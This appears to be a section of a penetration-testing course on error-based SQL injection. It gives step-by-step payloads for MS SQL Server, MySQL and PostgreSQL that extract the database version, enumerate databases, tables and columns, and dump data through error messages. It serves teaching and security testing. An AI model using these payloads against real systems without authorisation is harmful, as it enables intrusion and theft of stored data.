2.4.4 Exploiting Error-Based SQL Injection

Exploiting Error-Based SQL Injection

Error-based SQL injections are an advanced technique to extract data from a database by triggering errors that reveal information within the error messages. This method is particularly fast and effective and is supported by various database management systems (DBMS) such as Oracle, PostgreSQL, and MS SQL Server.

MS SQL Server Error-based Exploitation

MS SQL Server Version Extraction: To begin, it's crucial to identify the version of the MS SQL Server, as different versions may have different default column names in the master database. The CAST technique is employed to trigger a type conversion error, which reveals the database version. For example:

9999999 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096))); --

This payload, when injected into the vulnerable parameter, will cause an error message that includes the database version.

Enumerating Databases: After identifying the version, the next step is to enumerate the databases accessible to the current user. This is done using the db_name() function within a loop:

9999999 or 1 in (SELECT TOP 1 CAST (db_name(1) as varchar(4096))); --

Incrementing the argument of db_name() allows iterating through the available databases.

Enumerating Database Tables: Once databases are enumerated, the next step is to find the tables in a particular database:

9999999 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM <database_name>..sysobjects WHERE xtype='U' and name NOT IN ('')); --

Here, the xtype='U' condition ensures that only user-defined tables are considered.

Enumerating Columns: After identifying tables, the columns within those tables need to be enumerated:

9999 or 1 in (SELECT TOP 1 CAST (<db_name>..syscolumns.name as varchar(4096)) FROM <db_name>..syscolumns,<db_name>..sysobjects WHERE <db_name>..syscolumns.id=<db_name>..sysobjects.id AND  <db_name>..sysobjects.name=<table_name> AND <db_name>..syscolumns.name NOT IN ('')); --

This query retrieves the column names for a specific table in the specified database.

Dumping Data: Finally, with knowledge of the database structure, data can be dumped using a similar technique:

9999999 or 1 in (SELECT TOP 1 CAST(<column_name> as varchar(4096)) FROM <database_name>..<table_name> WHERE <column_name> NOT IN ('')); -- -

This query retrieves the actual content of the specified column in the specified table.

MySQL Error-Based SQLi Exploitation

To exploit error-based SQL injection on MySQL, the GROUP BY statement is utilized. An example payload skeleton is as follows:

SELECT 1,2 UNION SELECT COUNT(*), CONCAT(<information_to_extract>, floor(rand(0)*2)) AS x FROM information_schema.tables GROUP BY x;

For example, to extract the database version:

SELECT COUNT(*), CONCAT(version(), floor(rand(0)*2)) AS x FROM information_schema.tables GROUP BY x;

PostgreSQL Error-Based SQLi Exploitation

Error-based SQL injection on PostgreSQL involves leveraging the cast technique. For example, to extract the database version:

select cast(version() as numeric);

Iterating over the information_schema table allows enumerating tables:

select cast((select table_name from information_schema.tables limit 1 offset 0) as numeric);
select cast((select table_name from information_schema.tables limit 1 offset 1) as numeric);
select cast((select table_name from information_schema.tables limit 1 offset 2) as numeric);

Similar to MS SQL Server, error-based SQL injection requires understanding the functions and syntax specific to each DBMS. PentestMonkey's SQL injection cheat sheets can be valuable references for crafting payloads tailored to different databases:

• MSSQL Injection Cheat Sheet

• MySQL Injection Cheat Sheet

• PostgreSQL Injection Cheat Sheet